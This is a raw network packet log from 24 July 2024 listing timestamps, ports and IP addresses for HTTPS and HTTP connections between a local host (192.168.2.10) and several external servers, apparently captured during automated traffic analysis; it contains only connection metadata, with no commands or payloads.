Jul 24, 2024 19:56:45.051135063 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:45.051311970 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:45.051552057 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:45.096507072 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:45.603816032 CEST	80	49747	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:45.603996992 CEST	80	49747	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:45.604072094 CEST	49747	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:45.604286909 CEST	49747	80	192.168.2.10	189.165.133.52
Jul 24, 2024 19:56:45.609327078 CEST	80	49747	189.165.133.52	192.168.2.10
Jul 24, 2024 19:56:46.421185017 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:46.421283960 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:46.421379089 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:46.444159985 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:46.444185019 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:46.444200993 CEST	49746	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:46.444206953 CEST	443	49746	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:46.561820030 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:46.561863899 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:46.561969042 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:46.563311100 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:46.563322067 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:47.192950010 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:47.193094969 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:47.196012974 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:47.196023941 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:47.196285009 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:47.196290970 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:47.196362019 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:47.196582079 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:47.196592093 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:48.445159912 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:48.445252895 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:48.445353985 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:48.465656042 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:48.465656042 CEST	49750	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:48.465678930 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:48.465682983 CEST	443	49750	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:48.582351923 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:48.582396030 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:48.582473993 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:48.582938910 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:48.582951069 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:49.288474083 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:49.288693905 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:49.323113918 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:49.323129892 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:49.323421001 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:49.323425055 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:49.323498964 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:49.323936939 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:49.323950052 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:50.171267033 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:50.171339035 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:50.171634912 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:50.226162910 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:50.226191044 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:50.228780031 CEST	49752	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:50.228796005 CEST	443	49752	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:50.335340023 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:50.335382938 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:50.335468054 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:50.335897923 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:50.335906029 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:50.368541956 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:50.368643999 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:50.368791103 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:50.370951891 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:50.370965004 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:50.928878069 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:50.928961039 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:50.937122107 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:50.937167883 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:50.937571049 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:50.965760946 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:50.965861082 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:50.968539953 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:50.968559027 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:50.970344067 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:50.970350981 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:50.970402956 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:50.970407009 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:50.970458984 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:50.970757008 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:51.006614923 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:51.016510963 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:51.128813982 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:51.128844976 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:51.128988981 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:51.530860901 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:51.530968904 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:51.531097889 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:51.672684908 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:51.672724962 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:51.672736883 CEST	49754	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:51.672744989 CEST	443	49754	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:51.789323092 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:51.789372921 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:51.789443970 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:51.789966106 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:51.789983034 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.233733892 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:52.233815908 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:52.233865023 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:52.251725912 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:52.251759052 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:52.251782894 CEST	49753	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:52.251791954 CEST	443	49753	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:52.312592030 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.312669992 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.326004982 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.326031923 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.326270103 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.328330994 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.328358889 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.328399897 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.367316961 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:52.367372036 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:52.367432117 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:52.368017912 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:52.368030071 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:52.811785936 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:52.811839104 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:52.811914921 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:52.823642015 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.823770046 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.823844910 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.823880911 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.825552940 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.825612068 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.825634956 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.826634884 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.826695919 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.826704025 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.826744080 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.826798916 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.826826096 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.827831984 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:52.827842951 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.827848911 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:52.827917099 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.827929020 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.829399109 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.829461098 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.829472065 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.897219896 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.916222095 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.916605949 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:52.916671038 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.917654037 CEST	49756	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:52.917676926 CEST	443	49756	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:53.031243086 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:53.031326056 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:53.034406900 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:53.034416914 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:53.034454107 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:53.034459114 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:53.034595966 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:53.034600019 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:53.034693956 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:53.034904957 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:53.034915924 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:53.312366962 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:53.312526941 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:53.316210032 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:53.316235065 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:53.316579103 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:53.381737947 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:53.387377024 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:53.432511091 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:53.658335924 CEST	49760	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:53.658397913 CEST	443	49760	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:53.658490896 CEST	49760	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:53.658870935 CEST	49760	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:53.658885002 CEST	443	49760	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:53.673785925 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:53.673829079 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:53.673871040 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:53.673902035 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:53.674078941 CEST	443	49759	104.26.3.16	192.168.2.10
Jul 24, 2024 19:56:53.674124002 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:54.154536009 CEST	443	49760	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:54.154690981 CEST	49760	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:54.234019041 CEST	49760	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:54.234061003 CEST	443	49760	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:54.234376907 CEST	443	49760	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:54.236371994 CEST	49760	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:54.237286091 CEST	49760	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:54.237310886 CEST	443	49760	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:54.278964043 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:54.279042006 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:54.279144049 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:54.297884941 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:54.297919989 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:54.297935009 CEST	49757	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:54.297943115 CEST	443	49757	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:54.359683990 CEST	49759	443	192.168.2.10	104.26.3.16
Jul 24, 2024 19:56:54.413921118 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:54.413975000 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:54.414724112 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:54.415554047 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:54.415565014 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:54.697303057 CEST	443	49760	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:54.697469950 CEST	443	49760	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:54.697540998 CEST	49760	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:54.706311941 CEST	49760	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:54.706360102 CEST	443	49760	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:55.217163086 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:55.217231989 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:55.220151901 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:55.220175028 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:55.220268011 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:55.220273972 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:55.220336914 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:55.220340014 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:55.220443964 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:55.220658064 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:55.268505096 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:55.422492981 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:55.422538996 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:55.422817945 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:55.423190117 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:55.423202038 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:56.104232073 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:56.104253054 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:56.104324102 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:56.104331017 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:56.104392052 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:56.133809090 CEST	49761	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:56:56.133855104 CEST	443	49761	167.235.128.153	192.168.2.10
Jul 24, 2024 19:56:56.143121958 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:56.143147945 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:56.144165039 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:56.146028042 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:56.146419048 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:56.146475077 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:56.146548033 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:56.146554947 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:56.156039953 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:56.156092882 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:56.156394958 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:56.162306070 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:56.162337065 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:56.243990898 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:56.244044065 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:56.244138956 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:56.247026920 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:56.247040987 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:56.584232092 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:56.584336042 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:56.585598946 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:56.606964111 CEST	49762	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:56.606995106 CEST	443	49762	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:56.845788002 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:56.845880985 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:56.859680891 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:56.859700918 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:56.860021114 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:56.862894058 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:56.862984896 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:56.865638971 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:56.865658045 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:56.865825891 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:56.865833044 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:56.865950108 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:56.866326094 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:56.866337061 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:56.876434088 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:56.916507959 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.163878918 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.165672064 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.165740013 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.165767908 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.181057930 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.181114912 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.181139946 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.181927919 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.181982040 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.181982994 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.182003975 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.260754108 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.261408091 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.261424065 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.261526108 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.262706995 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.262717009 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.262811899 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.269037008 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.269045115 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.269098043 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.276690006 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.276699066 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.276736021 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.276743889 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.276763916 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.276803970 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.276803970 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.278685093 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.279112101 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.279603004 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.279666901 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.285847902 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.285922050 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.289426088 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:57.289480925 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:57.289843082 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:57.290299892 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:57.290318012 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:57.292551041 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.292645931 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.360544920 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.360641956 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.362478018 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.362567902 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.364723921 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.364803076 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.367758036 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.367831945 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.369240046 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.369484901 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.372220039 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.372292042 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.373709917 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.373769045 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.375245094 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.375453949 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.377744913 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.377839088 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.379687071 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.379764080 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.380785942 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.380863905 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.382740021 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.382812023 CEST	49763	443	192.168.2.10	31.14.70.245
